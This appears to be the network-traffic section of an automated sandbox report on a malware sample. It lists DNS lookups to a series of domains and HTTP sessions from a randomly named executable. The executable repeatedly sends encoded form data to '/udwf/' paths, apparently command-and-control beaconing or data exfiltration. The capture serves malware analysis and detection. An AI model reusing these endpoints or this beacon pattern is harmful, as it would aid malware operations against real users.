                                                                                                                            Nov 10, 2023 09:30:07.344763041 CET4975480192.168.2.10168.76.252.99
                                                                                                                            Nov 10, 2023 09:30:08.361449003 CET4975580192.168.2.10168.76.252.99
                                                                                                                            Nov 10, 2023 09:30:08.714710951 CET8049755168.76.252.99192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:08.714833021 CET4975580192.168.2.10168.76.252.99
                                                                                                                            Nov 10, 2023 09:30:08.715059042 CET4975580192.168.2.10168.76.252.99
                                                                                                                            Nov 10, 2023 09:30:09.068584919 CET8049755168.76.252.99192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:09.068847895 CET4975580192.168.2.10168.76.252.99
                                                                                                                            Nov 10, 2023 09:30:09.069096088 CET4975580192.168.2.10168.76.252.99
                                                                                                                            Nov 10, 2023 09:30:09.421710014 CET8049755168.76.252.99192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:15.070981026 CET4975680192.168.2.108.212.101.233
                                                                                                                            Nov 10, 2023 09:30:15.396200895 CET80497568.212.101.233192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:15.396337986 CET4975680192.168.2.108.212.101.233
                                                                                                                            Nov 10, 2023 09:30:15.396548986 CET4975680192.168.2.108.212.101.233
                                                                                                                            Nov 10, 2023 09:30:15.721514940 CET80497568.212.101.233192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:15.721585989 CET80497568.212.101.233192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:17.934366941 CET4975780192.168.2.108.212.101.233
                                                                                                                            Nov 10, 2023 09:30:18.255868912 CET80497578.212.101.233192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:18.255979061 CET4975780192.168.2.108.212.101.233
                                                                                                                            Nov 10, 2023 09:30:18.575270891 CET80497578.212.101.233192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:20.439018965 CET4975880192.168.2.108.212.101.233
                                                                                                                            Nov 10, 2023 09:30:20.766122103 CET80497588.212.101.233192.168.2.10
                                                                                                                            Nov 10, 2023 09:30:20.766216993 CET4975880192.168.2.108.212.101.233
                                                                                                                            Nov 10, 2023 09:30:20.766788006 CET4975880192.168.2.108.212.101.233
                                                                                                                            Nov 10, 2023 09:30:21.093313932 CET80497588.212.101.233192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 10, 2023 09:27:28.646183968 CET | 192.168.2.10 | 1.1.1.1 | 0xa2e9 | Standard query (0) | www.aifuturesummit.com | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:27:44.986780882 CET | 192.168.2.10 | 1.1.1.1 | 0x781d | Standard query (0) | www.littlehappiez.com | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:27:58.628226042 CET | 192.168.2.10 | 1.1.1.1 | 0xb891 | Standard query (0) | www.bellcom.media | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:28:13.814363003 CET | 192.168.2.10 | 1.1.1.1 | 0xc2d0 | Standard query (0) | www.tutorwave.online | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:28:28.830049038 CET | 192.168.2.10 | 1.1.1.1 | 0x721b | Standard query (0) | www.diabloseugene.com | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:28:43.768142939 CET | 192.168.2.10 | 1.1.1.1 | 0xa654 | Standard query (0) | www.spark-tech-global.xyz | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:28:59.189393044 CET | 192.168.2.10 | 1.1.1.1 | 0x15c4 | Standard query (0) | www.otternaut.live | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:29:14.721385002 CET | 192.168.2.10 | 1.1.1.1 | 0x2d8a | Standard query (0) | www.lxdedu.com | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:29:29.503151894 CET | 192.168.2.10 | 1.1.1.1 | 0xe42c | Standard query (0) | www.xn--4gq62f8w1alm9b.xyz | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:29:43.737668037 CET | 192.168.2.10 | 1.1.1.1 | 0xf09a | Standard query (0) | www.autokit.help | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:30:14.079902887 CET | 192.168.2.10 | 1.1.1.1 | 0x184a | Standard query (0) | www.iwhrkc.shop | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:30:28.939727068 CET | 192.168.2.10 | 1.1.1.1 | 0x17fc | Standard query (0) | www.633922.com | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:30:45.487359047 CET | 192.168.2.10 | 1.1.1.1 | 0x6ceb | Standard query (0) | www.sorenad.com | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:31:01.251776934 CET | 192.168.2.10 | 1.1.1.1 | 0x7113 | Standard query (0) | www.westcoastmedia.marketing | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 10, 2023 09:27:28.956147909 CET | 1.1.1.1 | 192.168.2.10 | 0xa2e9 | No error (0) | www.aifuturesummit.com | aifuturesummit.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 10, 2023 09:27:28.956147909 CET | 1.1.1.1 | 192.168.2.10 | 0xa2e9 | No error (0) | aifuturesummit.com |  | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:27:45.204215050 CET | 1.1.1.1 | 192.168.2.10 | 0x781d | No error (0) | www.littlehappiez.com | shops.myshopify.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 10, 2023 09:27:45.204215050 CET | 1.1.1.1 | 192.168.2.10 | 0x781d | No error (0) | shops.myshopify.com |  | 23.227.38.74 | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:27:59.338165045 CET | 1.1.1.1 | 192.168.2.10 | 0xb891 | No error (0) | www.bellcom.media |  | 91.195.240.123 | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:28:14.107490063 CET | 1.1.1.1 | 192.168.2.10 | 0xc2d0 | No error (0) | www.tutorwave.online | tutorwave.online |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 10, 2023 09:28:14.107490063 CET | 1.1.1.1 | 192.168.2.10 | 0xc2d0 | No error (0) | tutorwave.online |  | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:28:28.990993977 CET | 1.1.1.1 | 192.168.2.10 | 0x721b | No error (0) | www.diabloseugene.com |  | 199.59.243.225 | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:28:43.996252060 CET | 1.1.1.1 | 192.168.2.10 | 0xa654 | No error (0) | www.spark-tech-global.xyz |  | 162.0.222.119 | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:28:59.389941931 CET | 1.1.1.1 | 192.168.2.10 | 0x15c4 | No error (0) | www.otternaut.live | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 10, 2023 09:28:59.389941931 CET | 1.1.1.1 | 192.168.2.10 | 0x15c4 | No error (0) | parkingpage.namecheap.com |  | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:29:15.154055119 CET | 1.1.1.1 | 192.168.2.10 | 0x2d8a | No error (0) | www.lxdedu.com |  | 168.76.252.99 | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:29:29.677537918 CET | 1.1.1.1 | 192.168.2.10 | 0xe42c | No error (0) | www.xn--4gq62f8w1alm9b.xyz |  | 35.227.246.104 | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:29:43.937655926 CET | 1.1.1.1 | 192.168.2.10 | 0xf09a | No error (0) | www.autokit.help | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 10, 2023 09:29:43.937655926 CET | 1.1.1.1 | 192.168.2.10 | 0xf09a | No error (0) | parkingpage.namecheap.com |  | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:30:15.069221020 CET | 1.1.1.1 | 192.168.2.10 | 0x184a | No error (0) | www.iwhrkc.shop | 5mm70f.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 10, 2023 09:30:15.069221020 CET | 1.1.1.1 | 192.168.2.10 | 0x184a | No error (0) | 5mm70f.shop |  | 8.212.101.233 | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:30:15.069221020 CET | 1.1.1.1 | 192.168.2.10 | 0x184a | No error (0) | 5mm70f.shop |  | 8.212.102.171 | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:30:29.764601946 CET | 1.1.1.1 | 192.168.2.10 | 0x17fc | No error (0) | www.633922.com |  | 103.120.80.111 | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:30:45.967153072 CET | 1.1.1.1 | 192.168.2.10 | 0x6ceb | No error (0) | www.sorenad.com |  | 136.243.218.18 | A (IP address) | IN (0x0001) | false
Nov 10, 2023 09:31:01.633452892 CET | 1.1.1.1 | 192.168.2.10 | 0x7113 | No error (0) | www.westcoastmedia.marketing | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 10, 2023 09:31:01.633452892 CET | 1.1.1.1 | 192.168.2.10 | 0x7113 | No error (0) | parkingpage.namecheap.com |  | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.10 | 49714 | 84.32.84.32 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:27:29.171799898 CET | 69 | OUT | GET /udwf/?G0Yxd2Q=Kq0jCDSsi+gLhYagIFFza5XYEfPHq1wckJYs2pUOQJ4UOA08Cv/iplAOJSGKGG8twuAeLLQOU/XInoWNJu0WYoAEZtaSTts9sg==&vhQT=aV8PeNo0MvDl1 HTTP/1.1
                                                                                                                            Host: www.aifuturesummit.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Nov 10, 2023 09:27:29.367919922 CET | 71 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: hcdn
                                                                                                                            Date: Fri, 10 Nov 2023 08:27:29 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 10066
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            x-hcdn-request-id: 67430418c91d3bdef8e59b62c2e54fb5-phx-edge1
                                                                                                                            Expires: Fri, 10 Nov 2023 08:27:28 GMT
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.10 | 49715 | 23.227.38.74 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:27:45.358906984 CET | 83 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.littlehappiez.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.littlehappiez.com
                                                                                                                            Referer: http://www.littlehappiez.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=Q1/lM+s6OY3jYKB/zqqaaBIVixGcQWK/GktS6GnCi+6lwvtlJqKhiQSBfu8CVfQpZEI1Su1lvgLpQBt30NSTnrrAjIEWeTKucP2coPMdlcd8b4dD59IL4kSvg22bxfnJjYE6V2J5Nffa3b53qNp4wGxVjXNknSXplM2tSoR9s/lM0jxAgg==
Nov 10, 2023 09:27:45.742500067 CET | 85 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Fri, 10 Nov 2023 08:27:45 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            X-Sorting-Hat-PodId: 293
                                                                                                                            X-Sorting-Hat-ShopId: 83935199526
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-ShopId: 83935199526
                                                                                                                            X-ShardId: 293
                                                                                                                            Content-Language: en-US
                                                                                                                            Set-Cookie: localization=US; path=/; expires=Sun, 10 Nov 2024 08:27:45 GMT; SameSite=Lax
                                                                                                                            Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 11 Nov 2023 08:27:45 GMT; SameSite=Lax
                                                                                                                            Set-Cookie: _shopify_y=4449291f-7672-4969-ab63-6c8c671c5b94; Expires=Sat, 09-Nov-24 08:27:45 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                            Set-Cookie: _shopify_s=598daef1-c1fc-4481-949d-30a60bd7f1d1; Expires=Fri, 10-Nov-23 08:57:45 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                            Server-Timing: processing;dur=137
                                                                                                                            X-Shopify-Stage: production
                                                                                                                            Content-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=8cd67cc6-53bc-44c
Nov 10, 2023 09:27:45.742522001 CET | 86 | IN |
                                                                                                                            Data Ascii: -91ad-464dd7679b12X-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontrol


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.10 | 49725 | 84.32.84.32 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:28:18.175122976 CET | 174 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.tutorwave.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.tutorwave.online
                                                                                                                            Referer: http://www.tutorwave.online/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=C83CGTle2oPswQl5Y+8SD5gWS1zy3YRltRYWKvQytZXgubG2EpXcBB8jVCzB/fiaOD5I12JfUb8hr1imQ1XWgybHCHMDPlytzT1HzIUvNj504D3bbN6v94JXRU+E0mYaajen3Gve8C2RUxoDe7K2eIolTdLzJPMzZfrDn3zDBh7D+Xb7gAFXGblv+kOXck3hZZ1Mr+E=


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.10 | 49726 | 84.32.84.32 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:28:20.903774977 CET | 176 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.tutorwave.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.tutorwave.online
                                                                                                                            Referer: http://www.tutorwave.online/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.10 | 49727 | 84.32.84.32 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:28:23.619740963 CET | 177 | OUT | GET /udwf/?G0Yxd2Q=P+fiFlpl7OLgwg5VHMgiIoMqSXbT5qRAvhgaNfc+psLdu/aEMeH5P0Irdy+G4rOOLUFD4nVEMYENkV+qciPdkHTOCgwyI1K3xg==&vhQT=aV8PeNo0MvDl1 HTTP/1.1
                                                                                                                            Host: www.tutorwave.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Nov 10, 2023 09:28:23.815479040 CET | 178 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: hcdn
                                                                                                                            Date: Fri, 10 Nov 2023 08:28:23 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 10066
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            x-hcdn-request-id: f9c5cb9b94132774d2877d7f51617e99-phx-edge2
                                                                                                                            Expires: Fri, 10 Nov 2023 08:28:22 GMT
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.10 | 49728 | 199.59.243.225 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:28:29.144850016 CET | 189 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.diabloseugene.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.diabloseugene.com
                                                                                                                            Referer: http://www.diabloseugene.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=U4Z6tm4FxojtXLOn/4T4AEs7V8ysGzgGIoWa7gr5oGQip71xLadATvBVKjxg9v0AaISzplCPcDSpp8D9ImN+7zwSxkvmALB0UIcU2LiWODhI2gWxfFlZKZ0P9cTn5kVxh/lDtN4jo0JnmMNuI4pEV+9hPKUQhtBUxQ1PDi17C4BxJn6faw==
Nov 10, 2023 09:28:29.418311119 CET | 191 | IN | HTTP/1.1 200 OK
                                                                                                                            date: Fri, 10 Nov 2023 08:28:28 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1109
                                                                                                                            x-request-id: 8f8fcc29-11bc-4b7c-a6ba-031e1fd6e9d6
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_utrfvT18rLbkeWw3m+7aR4sW5K9D3ILMt3IRjGq+Uvf2ZaEZaFIKFbYzks2ocpn/4rY4FmPl0q6B7hNzo7390w==
                                                                                                                            set-cookie: parking_session=8f8fcc29-11bc-4b7c-a6ba-031e1fd6e9d6; expires=Fri, 10 Nov 2023 08:43:29 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_utrfvT18rLbkeWw3m+7aR4sW5K9D3ILMt3IRjGq+Uvf2ZaEZaFIKFbYzks2ocpn/4rY4FmPl0q6B7hNzo7390w==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTk
Nov 10, 2023 09:28:29.418328047 CET | 191 | IN |
                                                                                                                            Data Ascii: SuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGY4ZmNjMjktMTFiYy00YjdjLWE2YmEtMDMxZTFmZDZlOWQ2IiwicGFnZV90aW1lIjoxNjk


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.10 | 49729 | 199.59.243.225 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:28:33.133064985 CET | 192 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.diabloseugene.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.diabloseugene.com
                                                                                                                            Referer: http://www.diabloseugene.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=U4Z6tm4FxojtGb+nsJT4QUskQ8ysITgCIoKa7hvpoTAipexxKf9AQvBVFDwrgf0LaIeNpk+PcD2pp9z9IRZ90DwMk0v4ELB0UIcU2L28OD5I2QmxfklaWJ0MtMTn9kVth/kmtMlroxVnmM9uJtdFf+8oAqVhos4a/iltHDVVU+s5IyWMdEpMbQEw0xn8OGD+PayCM5M=
Nov 10, 2023 09:28:33.343295097 CET | 194 | IN | HTTP/1.1 200 OK
                                                                                                                            date: Fri, 10 Nov 2023 08:28:32 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1109
                                                                                                                            x-request-id: 5ffef964-b789-4de2-96a6-a6e5facc98bb
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_utrfvT18rLbkeWw3m+7aR4sW5K9D3ILMt3IRjGq+Uvf2ZaEZaFIKFbYzks2ocpn/4rY4FmPl0q6B7hNzo7390w==
                                                                                                                            set-cookie: parking_session=5ffef964-b789-4de2-96a6-a6e5facc98bb; expires=Fri, 10 Nov 2023 08:43:33 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_utrfvT18rLbkeWw3m+7aR4sW5K9D3ILMt3IRjGq+Uvf2ZaEZaFIKFbYzks2ocpn/4rY4FmPl0q6B7hNzo7390w==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTk
Nov 10, 2023 09:28:33.343338013 CET | 194 | IN |
                                                                                                                            Data Ascii: SuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWZmZWY5NjQtYjc4OS00ZGUyLTk2YTYtYTZlNWZhY2M5OGJiIiwicGFnZV90aW1lIjoxNjk


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.10 | 49730 | 199.59.243.225 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:28:35.810514927 CET | 197 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.diabloseugene.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
